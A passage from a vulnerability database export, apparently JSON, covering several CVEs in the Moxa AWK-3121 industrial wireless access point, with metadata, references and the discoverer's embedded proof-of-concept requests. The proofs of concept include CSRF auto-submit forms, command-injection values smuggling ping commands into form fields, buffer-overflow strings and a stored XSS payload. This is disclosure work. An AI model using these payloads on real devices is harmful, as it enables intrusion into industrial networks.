name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10699"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"db": "VULHUB",
"id": "VHN-120484"
},
{
"db": "VULMON",
"id": "CVE-2018-10699"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10699",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015617",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-327",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120484",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10699",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120484"
},
{
"db": "VULMON",
"id": "CVE-2018-10699"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10699"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-327"
}
]
},
"id": "VAR-201906-0789",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120484"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.847000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10699"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120484"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"db": "NVD",
"id": "CVE-2018-10699"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10699"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120484"
},
{
"db": "VULMON",
"id": "CVE-2018-10699"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10699"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-327"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120484"
},
{
"db": "VULMON",
"id": "CVE-2018-10699"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10699"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-327"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120484"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10699"
},
{
"date": "2019-06-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.623000",
"db": "NVD",
"id": "CVE-2018-10699"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-327"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-120484"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10699"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015617"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2018-10699"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-327"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-327"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015617"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-327"
}
],
"trust": 0.6
}
}
VAR-201906-0791
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. Moxa AWK-3121 There is a buffer error vulnerability in the 'iw_filename' parameter in version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log).
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0791",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"db": "NVD",
"id": "CVE-2018-10701"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10701"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10701",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
